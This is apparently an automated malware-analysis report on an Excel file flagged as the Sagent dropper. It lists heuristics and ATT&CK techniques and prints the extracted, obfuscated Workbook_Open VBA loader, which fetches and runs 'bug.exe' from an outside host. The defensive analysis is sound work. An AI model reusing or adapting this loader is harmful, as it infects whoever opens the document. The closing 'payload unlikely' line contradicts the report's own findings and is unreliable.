MALICIOUS
308
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
The critical heuristics indicate that this OOXML document contains an obfuscated VBA loader designed to execute a payload. The Workbook_Open macro is responsible for downloading a file from the URL 'http://zandrosgranito.com/bug.exe' and executing it. This behavior is consistent with the Sagent malware family.
Heuristics 6
-
ClamAV: Xls.Malware.Sagent-10035294-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Sagent-10035294-0
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
ZQWePolBCfGHaMKWEqrPLOkVXGFDAPLZMgtrVX.write Wj11ZasMkPolVCGdMNHS6577HDHAZPLMNBCVTWR341QW.responseBody -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set Wj11ZasMkPolVCGdMNHS6577HDHAZPLMNBCVTWR341QW = CreateObject(ZPLmKOJqr45VXFsdfZCAXPol06EQSDFZC(beihj5ltqe2gia1td3d6rsw("B" & "" & chr(18) & "" & chr(86) & "@" & "O" & chr(86) & "" & chr(64) & "" & chr(69) & "" & chr(86) & "A" & "" & chr(68) & chr(86) & chr(64) & " " & "" & "V" & "A" & beihj5ltqe2gia1td3d6rsw("3" & "" ) & chr(86) & "" & chr(64) & chr(16) & "V" & "" & "@" & "" & chr(64) & chr(86) & "A" & "B" & "" & chr(86) & chr(68) & "" & " " & chr(86) & "C" & "" & "N" & "" & "V" & "B" & "" & … -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Wj11ZasMkPolVCGdMNHS6577HDHAZPLMNBCVTWR341QW = CreateObject(ZPLmKOJqr45VXFsdfZCAXPol06EQSDFZC(beihj5ltqe2gia1td3d6rsw("B" & "" & chr(18) & "" & chr(86) & "@" & "O" & chr(86) & "" & chr(64) & "" & chr(69) & "" & chr(86) & "A" & "" & chr(68) & chr(86) & chr(64) & " " & "" & "V" & "A" & beihj5ltqe2gia1td3d6rsw("3" & "" ) & chr(86) & "" & chr(64) & chr(16) & "V" & "" & "@" & "" & chr(64) & chr(86) & "A" & "B" & "" & chr(86) & chr(68) & "" & " " & chr(86) & "C" & "" & "N" & "" & "V" & "B" & "" & … -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open()
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12046 bytes |
SHA-256: 7ae1440c7ef970a44b613558b4f21d97ee65e1acad37fb6cec705ff2bd25b82e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Loader"68 74 74 70 3A 2F 2F 7A 61 6E 64 72 6F 73 67 72 61 6E 69 74 6F 2E 63 6F 6D 2F 62 75 67 2E 65 78 65"
End Sub
Function fz10hh3vyu4rnnq(str As String) As Variant: Dim bytes() As Byte: bytes = str: fz10hh3vyu4rnnq = bytes: End Function
Function embdxmn253546v7rzgy7525(bytes() As Byte) As String: Dim str As String: str = bytes: embdxmn253546v7rzgy7525 = str: End Function
Function beihj5ltqe2gia1td3d6rsw(str As String) As String
Const KoLaNBv98RqWRPXczBVJH_PL89VCG As String = "dony7ncz58hvdnrc01y6nfd"
Dim Zpo9agGH12BCvMX0TSRLAPK() As Byte, SokNAH_() As Byte
Zpo9agGH12BCvMX0TSRLAPK = fz10hh3vyu4rnnq(str)
P90VCGfAsNCBRtAU_C = fz10hh3vyu4rnnq(KoLaNBv98RqWRPXczBVJH_PL89VCG)
Dim Sola67BChdPo_NcBBn As Long
Sola67BChdPo_NcBBn = UBound(Zpo9agGH12BCvMX0TSRLAPK)
ReDim BCVPlokIgdh67BCGF_BQAZ(0 To Sola67BChdPo_NcBBn) As Byte
Dim GOP As Long
For GOP = LBound(Zpo9agGH12BCvMX0TSRLAPK) To Sola67BChdPo_NcBBn:
If Not Zpo9agGH12BCvMX0TSRLAPK(GOP) = 0 Then
c = Zpo9agGH12BCvMX0TSRLAPK(GOP)
For i = 0 To UBound(P90VCGfAsNCBRtAU_C):
c = c Xor P90VCGfAsNCBRtAU_C(i)
Next i
BCVPlokIgdh67BCGF_BQAZ(GOP) = c
End If
Next GOP
beihj5ltqe2gia1td3d6rsw = embdxmn253546v7rzgy7525(BCVPlokIgdh67BCGF_BQAZ)
End Function
Public Sub Loader (Link As String)
Range(beihj5ltqe2gia1td3d6rsw(chr(55) & "" & chr(71) & chr(76) & chr(60) & chr(69) & "" & chr(70) )).Select
Selection.Borders(xlDiagonalDown).LineStyle = xlNone
Selection.Borders(xlDiagonalUp).LineStyle = xlNone
With Selection.Borders(xlEdgeLeft)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
Dim Wj11ZasMkPolVCGdMNHS6577HDHAZPLMNBCVTWR341QW
With Selection.Borders(xlEdgeTop)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
Dim ZQWePolBCfGHaMKWEqrPLOkVXGFDAPLZMgtrVX
With Selection.Borders(xlEdgeBottom)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
Dim shelaorl_babu
With Selection.Borders(xlEdgeRight)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
Set Wj11ZasMkPolVCGdMNHS6577HDHAZPLMNBCVTWR341QW = CreateObject(ZPLmKOJqr45VXFsdfZCAXPol06EQSDFZC(beihj5ltqe2gia1td3d6rsw("B" & "" & chr(18) & "" & chr(86) & "@" & "O" & chr(86) & "" & chr(64) & "" & chr(69) & "" & chr(86) & "A" & "" & chr(68) & chr(86) & chr(64) & " " & "" & "V" & "A" & beihj5ltqe2gia1td3d6rsw("3" & "" ) & chr(86) & "" & chr(64) & chr(16) & "V" & "" & "@" & "" & chr(64) & chr(86) & "A" & "B" & "" & chr(86) & chr(68) & "" & " " & chr(86) & "C" & "" & "N" & "" & "V" & "B" & "" & " " & "V" & chr(66) & " " & "" & "V" & "B" & "" & chr(78) & "V" & chr(67) & "B" & chr(86) & "C" & chr(66) & "" & chr(86) & "" & "C" & "" & chr(70) & "" )))
With Selection.Borders(xlInsideVertical)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
Set ZQWePolBCfGHaMKWEqrPLOkVXGFDAPLZMgtrVX = CreateObject(ZPLmKOJqr45VXFsdfZCAXPol06EQSDFZC(beihj5ltqe2gia1td3d6rsw("B" & "" & beihj5ltqe2gia1td3d6rsw(chr(49) ) & "" & "V" & "" & chr(66) & chr(66) & "" & "V" & "" & chr(66) & " " & "" & chr(86) & chr(66) & "B" & "V" & "B" & chr(68) & "" & "V" & chr(68) & chr(19) & chr(86) & "C" & beihj5ltqe2gia1td3d6rsw("3" & "" ) & "V" & "A" & chr(66) & "" & "V" & "A" & "" & "D" & chr(86) & "" & "@" & chr(67) & "" & chr(86) & chr(64) & "" & beihj5ltqe2gia1td3d6rsw(chr(49) ) & "" & chr(86) & chr(64) & "" & " " & "" )))
With Selection.Borders(xlInsideHorizontal)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
Set shelaorl_babu = CreateObject(ZPLmKOJqr45VXFsdfZCAXPol06EQSDFZC(beihj5ltqe2gia1td3d6rsw("C" & "" & chr(65) & "" & chr(86) & "" & "C" & chr(69) & "V" & "" & "@" & chr(69) & "" & "V" & "" & "A" & "" & chr(68) & chr(86) & "@" & "" & "O" & "" & chr(86) & chr(65) & "" & "F" & "V" & "A" & "B" & "" & chr(86) & "" & "D" & " " & "V" & "" & chr(67) & "E" & "V" & chr(64) & chr(78) & "" & chr(86) & "" & "@" & "" & chr(67) & chr(86) & chr(64) & " " & chr(86) & "" & chr(64) & " " & "V" & "" )))
ActiveWindow.SmallScroll Down:=-12
Range(beihj5ltqe2gia1td3d6rsw(chr(55) & chr(71) )).Select
ActiveCell.FormulaR1C1 = beihj5ltqe2gia1td3d6rsw("%" & "X" & chr(56) & "" & " " & "" )
Range(beihj5ltqe2gia1td3d6rsw("4" & chr(71) )).Select
ActiveCell.FormulaR1C1 = beihj5ltqe2gia1td3d6rsw("8" & chr(23) & " " & chr(19) & "" )
Range(beihj5ltqe2gia1td3d6rsw(chr(53) & chr(71) )).Select
ActiveCell.FormulaR1C1 = beihj5ltqe2gia1td3d6rsw(chr(35) & " " & chr(31) & "" & chr(2) & "" )
Range(beihj5ltqe2gia1td3d6rsw(chr(50) & "" & chr(71) & "" )).Select
ActiveCell.FormulaR1C1 = beihj5ltqe2gia1td3d6rsw(chr(38) & "" & " " & "" & chr(31) & " " & "" & " " & "" )
Range(beihj5ltqe2gia1td3d6rsw(chr(51) & "" & beihj5ltqe2gia1td3d6rsw(chr(49) ) & "" )).Select
ActiveCell.FormulaR1C1 = beihj5ltqe2gia1td3d6rsw(chr(39) & "" & chr(2) & " " & "" )
Range(beihj5ltqe2gia1td3d6rsw(chr(48) & "" & "G" & chr(76) & "" & "<" & "E" & "" & "F" )).Select
Url = ZPLmKOJqr45VXFsdfZCAXPol06EQSDFZC(Link)
With Selection
.HorizontalAlignment = xlCenter
.VerticalAlignment = xlBottom
.WrapText = False
.Orientation = 0
.AddIndent = False
.IndentLevel = 0
.ShrinkToFit = False
.ReadingOrder = xlContext
.MergeCells = False
End With
Selection.Merge
urloasjdklweqad_babu = ZPLmKOJqr45VXFsdfZCAXPol06EQSDFZC(beihj5ltqe2gia1td3d6rsw("B" & chr(69) & "" & "V" & "" & "E" & " " & "" & "V" & "C" & "" & chr(21) & "V" & "C" & "" & chr(67) & "" & chr(86) & "" & "A" & "" & "E" & chr(86) & "" & chr(64) & "" & "C" & "" & "V" & chr(65) & "D" & "" & chr(86) & "" & chr(65) & "" & chr(69) & "V" & "C" & "" & " " & "" & chr(86) & "" & chr(67) & "F" & "V" & chr(65) & "" & chr(67) & "" & chr(86) & "" & chr(64) & chr(68) & chr(86) & chr(64) & " " & "" & chr(86) & "" & chr(64) & "" & chr(79) & "" & "V" & "@" & "" & chr(69) & "" & "V" & "C" & chr(21) & "" & "V" & chr(65) & "" & chr(69) & "V" & chr(65) & "@" & "" & "V" & "" & chr(64) & "" & "E" & "" & "V" & "@" & "" & chr(78) & "" & chr(86) & "" & chr(64) & chr(16) & chr(86) & "" & "A" & "E" & chr(86) & "" & chr(65) & "" & chr(66) & "" & chr(86) & chr(69) & chr(69) & chr(86) & chr(69) & "D" & chr(86) & "" & "D" & chr(19) & "V" & chr(64) & chr(67) & "V" & chr(65) & "N" & chr(86) & "" & chr(64) & "" & chr(67) ))
With Selection
.HorizontalAlignment = xlCenter
.VerticalAlignment = xlBottom
.WrapText = False
.Orientation = xlVertical
.AddIndent = False
.IndentLevel = 0
.ShrinkToFit = False
.ReadingOrder = xlContext
.MergeCells = True
End With
RUNCMD = ZPLmKOJqr45VXFsdfZCAXPol06EQSDFZC(beihj5ltqe2gia1td3d6rsw("B" & chr(69) & "" & "V" & "" & "E" & " " & "" & "V" & "C" & "" & chr(21) & "V" & "C" & "" & chr(67) & "" & chr(86) & "" & "A" & "" & "E" & chr(86) & "" & chr(64) & "" & "C" & "" & "V" & chr(65) & "D" & "" & chr(86) & "" & chr(65) & "" & chr(69) & "V" & "C" & "" & " " & "" & chr(86) & "" & chr(67) & "F" & "V" & chr(65) & "" & chr(67) & "" & chr(86) & "" & chr(64) & chr(68) & chr(86) & chr(64) & " " & "" & chr(86) & "" & chr(64) & "" & chr(79) & "" & "V" & "@" & "" & chr(69) & "" & "V" & "C" & chr(21) & "" & "V" & chr(65) & "" & chr(69) & "V" & chr(65) & "@" & "" & "V" & "" & chr(64) & "" & "E" & "" & "V" & "@" & "" & chr(78) & "" & chr(86) & "" & chr(64) & chr(16) & chr(86) & "" & "A" & "E" & chr(86) & "" & chr(65) & "" & chr(66) & "" & chr(86) & chr(69) & chr(69) & chr(86) & chr(69) & "D" & chr(86) & "" & "D" & chr(19) & "V" & chr(64) & chr(67) & "V" & chr(65) & "N" & chr(86) & "" & chr(64) & "" & chr(67) ))
Range(beihj5ltqe2gia1td3d6rsw(chr(48) & "" & "G" & chr(76) & "" & "<" & "E" & "" & "F" )).Select
ActiveCell.FormulaR1C1 = beihj5ltqe2gia1td3d6rsw("%" & "" )
Range(beihj5ltqe2gia1td3d6rsw(chr(48) & "" & "G" & chr(76) & "" & "<" & "E" & "" & "F" )).Select
ActiveCell.FormulaR1C1 = beihj5ltqe2gia1td3d6rsw("%" & "" ) & Chr(10) & beihj5ltqe2gia1td3d6rsw(" " & "" ) & Chr(10) & beihj5ltqe2gia1td3d6rsw(chr(27) & "" ) & Chr(10) & beihj5ltqe2gia1td3d6rsw(" " & "" ) & Chr(10) & beihj5ltqe2gia1td3d6rsw(" " & "" ) & Chr(10) & beihj5ltqe2gia1td3d6rsw(chr(15) & "" )
Range(beihj5ltqe2gia1td3d6rsw(chr(48) & "" & "G" & chr(76) & "" & "<" & "E" & "" & "F" )).Select
Wj11ZasMkPolVCGdMNHS6577HDHAZPLMNBCVTWR341QW.Open beihj5ltqe2gia1td3d6rsw(chr(49) ) + beihj5ltqe2gia1td3d6rsw("3" & "" ) + beihj5ltqe2gia1td3d6rsw("""" & "" ), Url, False
With Selection
.HorizontalAlignment = xlCenter
.VerticalAlignment = xlBottom
.Orientation = 0
.AddIndent = False
.IndentLevel = 0
.ShrinkToFit = False
.ReadingOrder = xlContext
.MergeCells = True
End With
Wj11ZasMkPolVCGdMNHS6577HDHAZPLMNBCVTWR341QW.send
Range(beihj5ltqe2gia1td3d6rsw(chr(48) & "" & "G" & chr(76) & "" & "<" & "E" & "" & "F" )).Select
With Selection
.HorizontalAlignment = xlCenter
.VerticalAlignment = xlCenter
.Orientation = 0
.AddIndent = False
.IndentLevel = 0
.ShrinkToFit = False
.ReadingOrder = xlContext
.MergeCells = True
End With
ZQWePolBCfGHaMKWEqrPLOkVXGFDAPLZMgtrVX.Type = 1
With Selection.Font
.Name = beihj5ltqe2gia1td3d6rsw(chr(53) & "" & chr(23) & chr(26) & "" & chr(31) & "" & chr(20) & " " & "" & chr(31) )
.Size = 14
.Strikethrough = False
.Superscript = False
.Subscript = False
.OutlineFont = False
.Shadow = False
.Underline = xlUnderlineStyleNone
.ThemeColor = xlThemeColorLight1
.TintAndShade = 0
.ThemeFont = xlThemeFontMinor
End With
ZQWePolBCfGHaMKWEqrPLOkVXGFDAPLZMgtrVX.Open
Selection.Font.Bold = True
ZQWePolBCfGHaMKWEqrPLOkVXGFDAPLZMgtrVX.write Wj11ZasMkPolVCGdMNHS6577HDHAZPLMNBCVTWR341QW.responseBody
Selection.Font.Italic = True
ZQWePolBCfGHaMKWEqrPLOkVXGFDAPLZMgtrVX.savetofile urloasjdklweqad_babu, 2
Range(beihj5ltqe2gia1td3d6rsw(":" & "B" )).Select
shelaorl_babu.Run RUNCMD
End Sub
Public Function ZPLmKOJqr45VXFsdfZCAXPol06EQSDFZC(ByVal AZdsFD12wPloAMNBgTRDCXfsDDA876BCGHAPLZCXV As String) As String
Dim ze4x92w065ei9elfwze79bj As String
Dim c9z9i3kyxz770u6iw6i3vvs As String
Dim i3z6g941zcmom4ssn108l76 As Long
For QWPlaNBMZCX56RSzPLAJH651ARPMZXcNB = 1 To Len(AZdsFD12wPloAMNBgTRDCXfsDDA876BCGHAPLZCXV) Step 3
ZCXvPLOMNBCVT654DSEraPLAKMHVXGgf = Chr$(Val(beihj5ltqe2gia1td3d6rsw(chr(80) & "" & chr(62) ) & Mid$(AZdsFD12wPloAMNBgTRDCXfsDDA876BCGHAPLZCXV, QWPlaNBMZCX56RSzPLAJH651ARPMZXcNB, 2)))
c9z9i3kyxz770u6iw6i3vvs = c9z9i3kyxz770u6iw6i3vvs & ZCXvPLOMNBCVT654DSEraPLAKMHVXGgf
Next QWPlaNBMZCX56RSzPLAJH651ARPMZXcNB
ZPLmKOJqr45VXFsdfZCAXPol06EQSDFZC = c9z9i3kyxz770u6iw6i3vvs
End Function
Attribute VB_Name = "Sheet 1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 8704 bytes |
SHA-256: 00943456f381a6261ae2f30a8e0dc116224bb607001ecb06d0da81ce83d21d05 |
|||
|
Detection
ClamAV:
Xls.Malware.Sagent-10035294-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.